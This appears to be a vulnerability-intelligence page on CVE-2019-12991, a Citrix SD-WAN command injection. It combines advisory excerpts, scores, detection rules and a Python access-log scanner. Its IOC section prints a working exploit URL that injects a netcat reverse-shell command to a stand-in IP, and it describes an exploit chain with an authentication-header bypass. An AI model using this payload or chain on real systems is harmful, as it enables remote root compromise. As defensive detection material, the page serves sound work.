CVE-2019-12991
Published 2019-07-16
CVE-2019-12991: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 5 of 6).
Priority P1 · 91 · high · CVSS 3.1 8.8
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, remediation due 2022-04-15
Exploited in the wild
EPSS 73.88% (99.4th percentile)
Affected (6 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citrix | citrix_sd-wan | — | — |
| citrix | netscaler_adc_gateway | — | — |
| citrix | netscaler_sd-wan | >= 10.0.0 < 10.0.8 | 10.0.8 |
| citrix | sd-wan | — | — |
| citrix | sd-wan | >= 10.2.0 < 10.2.3 | 10.2.3 |
| citrix | xenserver | — | — |
Detection & IOCs (extracted from sources)
URL: /cgi-bin/installpatch.cgi?swc-token=01234&installfile=`sudo%20nc%20-nv%20192.168.1.191%204444%20-e%20/bin/bash`
- Detect HTTP GET requests to /cgi-bin/installpatch.cgi containing backtick-wrapped OS commands in the 'installfile' parameter, indicative of command injection exploitation.
- Alert on HTTP requests to /cgi-bin/installpatch.cgi where the 'installfile' query parameter contains shell metacharacters such as backticks or pipe characters.
- Monitor for HTTP POST requests to /sdwan/nitro/v1/config/get_package_file?action=file_download with the 'SSL_CLIENT_VERIFY: SUCCESS' header set by a client (not the TLS layer), as this is used to bypass authentication in the chained exploit.
- Look for execution of 'nc' or 'netcat' with '-e /bin/bash' arguments spawned by the web server process (e.g., apache/httpd), indicating a successful reverse shell via CVE-2019-12991.
- Monitor for execution of user_management.pl with 'addUser' arguments from non-administrative sessions, indicating post-exploitation privilege escalation on the appliance.
- The command injection (CVE-2019-12991) requires prior authentication; however, it can be chained with the unauthenticated SQL injection (CVE-2019-12989) to achieve full unauthenticated RCE. Detection logic should account for both the standalone authenticated case and the chained unauthenticated exploit path.
- The swc-token value used in the installpatch.cgi exploit URL is dynamically generated (a random 5-digit integer) during the SQL injection phase; detection rules should match on the parameter name pattern rather than a static token value.
- The exploit expects a ReadTimeout on the command injection request as the success indicator (the reverse shell blocks the response); network-level detection should not rely solely on HTTP response codes for this endpoint.
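As an added example (not taken from any source quoted on this page), the Python below applies the first two detection notes, together with the swc-token and response-code caveats, to web-server access-log lines; the combined-log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined access-log format (assumption: Apache/Nginx style). Status may be "-"
# when the appliance never answered, matching the ReadTimeout behaviour noted above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}|-) '
)

SUSPECT_PATH = "/cgi-bin/installpatch.cgi"
# Shell metacharacters that have no place in a legitimate patch file name.
METACHARS = re.compile(r"[`|;&$<>(){}]")


def inspect_request(target: str):
    """Return the decoded installfile value when it carries shell metacharacters, else None.

    The swc-token value is random per exploit run, so it is deliberately not matched on.
    """
    url = urlsplit(target)
    if url.path != SUSPECT_PATH:
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes once
    for value in params.get("installfile", []):
        decoded = unquote(value)  # second pass catches double-encoded metacharacters
        if METACHARS.search(decoded):
            return decoded
    return None


def scan_log(lines):
    """Return a list of alert dicts; the status code is recorded but never used as a gate."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = inspect_request(m["target"])
        if hit is not None:
            alerts.append({"src": m["ip"], "ts": m["ts"], "status": m["status"], "installfile": hit})
    return alerts


# Constructed sample log lines (not real traffic): a legitimate patch install, an injection
# attempt whose response timed out, and an unrelated request.
SAMPLE_LOG = [
    '198.51.100.2 - - [10/Jul/2019:08:01:12 +0000] "GET /cgi-bin/installpatch.cgi?swc-token=48213&installfile=patch-10.2.3.tar.gz HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Jul/2019:08:04:55 +0000] "GET /cgi-bin/installpatch.cgi?swc-token=91034&installfile=%60id%60 HTTP/1.1" 504 0',
    '198.51.100.9 - - [10/Jul/2019:08:05:03 +0000] "GET /sdwan/nitro/v1/config/status HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```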
CVSS provenance
- NVD v3.1: 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- NVD v2.0: 9.0 CRITICAL, AV:N/AC:L/Au:S/C:C/I:C/A:C
- VulnCheck: 8.8 HIGH
- CISA: 8.8 HIGH
CISA
Citrix SD-WAN and NetScaler Command Injection Vulnerability
cisa·2022-03-25·CVSS 8.8
CVE-2019-12991 [HIGH] CWE-78 Citrix SD-WAN and NetScaler Command Injection Vulnerability
Vulnerability: Citrix SD-WAN and NetScaler Command Injection Vulnerability
Affected: Citrix SD-WAN and NetScaler
Authenticated Command Injection in Citrix SD-WAN Appliance and NetScaler SD-WAN Appliance.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-12991
Remediation Due Date: 2022-04-15
Citrix
CVE-2019-12991: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 5 of 6).
vendor_citrix·2019-07-16·CVSS 8.8
CVE-2019-12991 [HIGH] CWE-78 CVE-2019-12991: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 5 of 6).
CISA KEV: Authenticated Command Injection in Citrix SD-WAN Appliance and NetScaler SD-WAN Appliance.
Required Action: Apply updates per vendor instructions.
Citrix
Citrix SD-WAN Multiple Security Updates
vendor_citrix·CVSS 9.8
CVE-2019-12985 [CRITICAL] Citrix SD-WAN Multiple Security Updates
Citrix SD-WAN Multiple Security Updates
Description of Problem
Multiple vulnerabilities have been identified in the management console of the Citrix SD-WAN Center and NetScaler SD-WAN Center. Multiple vulnerabilities have also been identified on the Citrix SD-WAN Appliance and NetScaler SD-WAN Appliance. Collectively, these vulnerabilities could result in an unauthenticated attacker executing commands as root against the SD-WAN Center management console, or potentially be used to gain root privileges on the SD-WAN appliance. The vulnerabilities have been assigned the following CVE numbers.
- CVE-2019-12985 – Unauthenticated Command Injection in Citrix SD-WAN Center 10.2.x before 10.2.3 and NetScaler SD-WAN Center 10.0.x before 10.0.8.
- CVE-2019-12986 – Unauthenticated Command Injection in Citrix SD-WAN
GHSA
GHSA-462p-6gjx-6wj6: Citrix SD-WAN 10
ghsa_unreviewed·2022-05-24
CVE-2019-12991 [HIGH] CWE-78 GHSA-462p-6gjx-6wj6: Citrix SD-WAN 10
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 5 of 6).
VulnCheck
Citrix SD-WAN and NetScaler Command Injection Vulnerability
vulncheck·2019·CVSS 8.8
CVE-2019-12991 [HIGH] CWE-78 Citrix SD-WAN and NetScaler Command Injection Vulnerability
Citrix SD-WAN and NetScaler Command Injection Vulnerability
Authenticated Command Injection in Citrix SD-WAN Appliance and NetScaler SD-WAN Appliance.
Affected: Citrix SD-WAN and NetScaler
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2022-04-15
No detection rules found.
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Ruchna Nigam
Published: December 13, 2019
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp
Tenable
Multiple Vulnerabilities Found in Citrix SD-WAN Center and SD-WAN Appliances
blogs_tenable·2019-07-11
Multiple Vulnerabilities Found in Citrix SD-WAN Center and SD-WAN Appliances
Tenable
Citrix SD-WAN Appliance Multiple Vulnerabilities
blogs_tenable·2019-07-02
Citrix SD-WAN Appliance Multiple Vulnerabilities
- http://packetstormsecurity.com/files/153638/Citrix-SD-WAN-Appliance-10.2.2-Authentication-Bypass-Remote-Command-Execution.html
- http://www.securityfocus.com/bid/109133
- https://support.citrix.com/article/CTX251987
- https://www.tenable.com/security/research/tra-2019-32
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-12991
Published: 2019-07-16
Added to CISA KEV: 2022-03-25
Exploited in the wild